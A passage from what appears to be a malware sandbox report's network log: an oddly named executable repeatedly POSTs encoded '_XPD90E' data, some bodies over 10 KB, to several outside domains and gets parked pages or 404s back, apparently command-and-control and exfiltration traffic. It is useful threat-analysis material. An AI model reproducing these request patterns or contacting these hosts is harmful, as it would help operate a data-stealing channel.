                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:06:36.062623978 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:06:35 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_XPD90E=q+OYZAje5TGGPxruqv4Ie4uGL0FJBdVtlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAIZom36/OATPlTemOBBCw5W17q1Y0x2snJ2U=&qp=qTZ8t28"}</script></head></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      29 | 192.168.2.4 | 50036 | 199.59.243.227 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:41.169209957 CEST | 715 | OUT | POST /7n9v/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.rebel.tienda
                                                                                                      Origin: http://www.rebel.tienda
                                                                                                      Referer: http://www.rebel.tienda/7n9v/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=0NEXbjzg9WfMYwhSr+fp8cjsJMd9ePtei1LtfbbV00gDnbvcWEhPzJx3ICvFZ/QZlZs9/R25pPZeUxDIphLfPFtx24xw/qKMM6F/aoM6FMF2NzFDmIy5y7vuvrx0IyTOlIhZPPtwCm3ny1q1WQQUJhoQ4ter6Tz9doLMCkWxksnL1VT8XMMXxTtgwrMInajEFw==
                                                                                                      Oct 22, 2024 09:06:41.818844080 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      date: Tue, 22 Oct 2024 07:06:41 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1118
                                                                                                      x-request-id: d1696201-974a-4430-8727-95ced26205d4
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==
                                                                                                      set-cookie: parking_session=d1696201-974a-4430-8727-95ced26205d4; expires=Tue, 22 Oct 2024 07:21:41 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Oct 22, 2024 09:06:41.818983078 CEST | 571 | IN |
                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDE2OTYyMDEtOTc0YS00NDMwLTg3MjctOTVjZWQyNjIwNWQ0IiwicGFnZV90aW1lIjoxNzI5NTgwOD


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      30 | 192.168.2.4 | 50037 | 199.59.243.227 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:43.721724033 CEST | 735 | OUT | POST /7n9v/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.rebel.tienda
                                                                                                      Origin: http://www.rebel.tienda
                                                                                                      Referer: http://www.rebel.tienda/7n9v/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=0NEXbjzg9WfMJhRSpd3p+8jvDsd9F/taiyDtfavF0GEDn6fcXFhPyJx3DivKXfQClZpI/R65pLxeUwzIpWfeeFt3+Yx+g6KMM6F/aoZXFMN2NCVDnpy68bvvorx0FSTKlIhnPNJKCgzny0a1WC4Xcxoal9fjpSO6TZmlIC6Rs/H95zemG9tAjTJTtsF8qZeNe/3msJp5rmnMtA9qThSzrUQ=
                                                                                                      Oct 22, 2024 09:06:44.330202103 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      date: Tue, 22 Oct 2024 07:06:44 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1118
                                                                                                      x-request-id: b6751777-7e8d-405b-8bcf-36284d61befa
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==
                                                                                                      set-cookie: parking_session=b6751777-7e8d-405b-8bcf-36284d61befa; expires=Tue, 22 Oct 2024 07:21:44 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Oct 22, 2024 09:06:44.330292940 CEST | 571 | IN
                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjY3NTE3NzctN2U4ZC00MDViLThiY2YtMzYyODRkNjFiZWZhIiwicGFnZV90aW1lIjoxNzI5NTgwOD


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      31 | 192.168.2.4 | 50038 | 199.59.243.227 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:46.265604973 CEST | 10817 | OUT | POST /7n9v/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.rebel.tienda
                                                                                                      Origin: http://www.rebel.tienda
                                                                                                      Referer: http://www.rebel.tienda/7n9v/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E= [TRUNCATED]
                                                                                                      Oct 22, 2024 09:06:46.889688015 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      date: Tue, 22 Oct 2024 07:06:46 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1118
                                                                                                      x-request-id: 9c850ddd-76f4-4d4e-ab81-c419f4b97f0b
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==
                                                                                                      set-cookie: parking_session=9c850ddd-76f4-4d4e-ab81-c419f4b97f0b; expires=Tue, 22 Oct 2024 07:21:46 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Oct 22, 2024 09:06:46.889699936 CEST | 571 | IN
                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWM4NTBkZGQtNzZmNC00ZDRlLWFiODEtYzQxOWY0Yjk3ZjBiIiwicGFnZV90aW1lIjoxNzI5NTgwOD


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      32 | 192.168.2.4 | 50039 | 199.59.243.227 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:48.806298018 CEST | 450 | OUT | GET /7n9v/?_XPD90E=5Ps3YXPo0Vj4JhRJ3u74t7/AROUJdOxXpTrzI5rt8FAfia/wVGxKw+cKGzuZcepElfg31D2wj7kRRQ+omDm5O2Jc0Yxiq9+lHbIPKMtQeuR7JUZIl/WZ4Mo=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.rebel.tienda
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:06:49.435789108 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      date: Tue, 22 Oct 2024 07:06:48 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1458
                                                                                                      x-request-id: baf7572d-52e2-4e3f-9af0-9b96efb3901d
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oTbHt2p580sQp3kDeyiV4a4dLpgIj+ZjaCGjRZUip+h5r5Fj33br0tu24A4c7brOupKMyqOF/FexTdllXN7ySg==
                                                                                                      set-cookie: parking_session=baf7572d-52e2-4e3f-9af0-9b96efb3901d; expires=Tue, 22 Oct 2024 07:21:49 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oTbHt2p580sQp3kDeyiV4a4dLpgIj+ZjaCGjRZUip+h5r5Fj33br0tu24A4c7brOupKMyqOF/FexTdllXN7ySg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Oct 22, 2024 09:06:49.435837030 CEST | 911 | IN
                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmFmNzU3MmQtNTJlMi00ZTNmLTlhZjAtOWI5NmVmYjM5MDFkIiwicGFnZV90aW1lIjoxNzI5NTgwOD


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      33 | 192.168.2.4 | 50040 | 13.248.169.48 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:54.490855932 CEST | 709 | OUT | POST /izfe/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      Origin: http://www.ila.beauty
                                                                                                      Referer: http://www.ila.beauty/izfe/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=Uo5VWlPpoEXKtP6I/WMq/gVE5YJaQE8HfeCkUBhfqP06vKkpmjnL/wqCt4PnRosvHBrZIbGEjDp/JIn/xTwRy2uVHpVfUBFtpswVZRs1gJ+giXPihfP++ywXQsDtjdMZpOFJUtIfj2RcMkEaCYzuegk9py4Gcv4NMorrkRfJXaEh2/dQVSzCjXrLWYCO/B2MJQ==


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      34 | 192.168.2.4 | 50041 | 13.248.169.48 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:57.075201035 CEST | 729 | OUT | POST /izfe/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      Origin: http://www.ila.beauty
                                                                                                      Referer: http://www.ila.beauty/izfe/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=Uo5VWlPpoEXK/9uI910qowVDgoJaak8Dfe+kUFYUp8A6vvAppCnL6wqCmYPiVosSHGiuIeGEjCN/JKv/t14QymuXS5VRbhFtpswVZRobgJGgim/ii6794CwYRsDtwNNepOF/UoQmjwdcMk0aBKbtHQl2nS4RZNRWF5uUuA2pX+VZz5QKEjSVxXP4LfL6yCLFSRKG+tnZoFfAPbaABkgDdf0=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      35 | 192.168.2.4 | 50042 | 13.248.169.48 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:06:59.729607105 CEST | 10811 | OUT | POST /izfe/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      Origin: http://www.ila.beauty
                                                                                                      Referer: http://www.ila.beauty/izfe/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E= [TRUNCATED]


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      36 | 192.168.2.4 | 50043 | 13.248.169.48 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:02.327716112 CEST | 448 | OUT | GET /izfe/?_XPD90E=ZqR1VSau/njxt8yVh1Y7o1xJ67xnVWQPWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h12nFCEf6h8WT1ssqtMI1FtouyVgynF3e/12Wg=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:03.044328928 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:07:02 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_XPD90E=ZqR1VSau/njxt8yVh1Y7o1xJ67xnVWQPWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h12nFCEf6h8WT1ssqtMI1FtouyVgynF3e/12Wg=&qp=qTZ8t28"}</script></head></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      37 | 192.168.2.4 | 50044 | 38.88.82.56 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:07:08.754178047 CEST | 730 | OUT | POST /lk0h/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      Origin: http://www.college-help.info
                                                                                                      Referer: http://www.college-help.info/lk0h/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=3iLjkEAo5UEVpkZ53CpFuifM6GVbUffkgLcVtxzSS/kbLVj9SWsuB6auOiyvtgUAshvtgFwq/YKpMZihAXvioTG1MI8XRXPNmZ0VAe+IG3G0TtiK/qyrlz0WoUfFgOE4oFTxOccKF/ncqqQzo/01DX/lmddS6IeE/fFVif2YGOeYJFn7xyUx1cT6e1Z7Av8cEA==
                                                                                                      Oct 22, 2024 09:07:09.452936888 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:09 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:09.452990055 CEST  185  IN
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      38  192.168.2.4  50045  38.88.82.56  80  5796  C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Oct 22, 2024 09:07:11.293164015 CEST  750  OUT  POST /lk0h/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      Origin: http://www.college-help.info
                                                                                                      Referer: http://www.college-help.info/lk0h/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=3iLjkEAo5UEVrHR5nRBFvCfL5GVbf/fogLQVt1rCSNQbK1T9DkIuC6auFCyqzQVMshjfgHkq/ZqpMcGhAkHjpDG3Eo8Vf3PNmZ0VAfbdG3u0ScSK/LyooT0X+EfFxeE8oFSLOZEsF6rcqrAzou0qKX/nltdG+4DJmag5q8K3At+5FjqhgD1mnc3JDyQPNsBVfNwiSkb6vPjnu6g0+IdGBUY=
                                                                                                      Oct 22, 2024 09:07:11.983941078 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:11 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:11.983952999 CEST  185  IN
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      39  192.168.2.4  50046  38.88.82.56  80  5796  C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Oct 22, 2024 09:07:13.905544043 CEST  10832  OUT  POST /lk0h/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      Origin: http://www.college-help.info
                                                                                                      Referer: http://www.college-help.info/lk0h/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E= [TRUNCATED]
                                                                                                      Oct 22, 2024 09:07:14.565916061 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:14 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
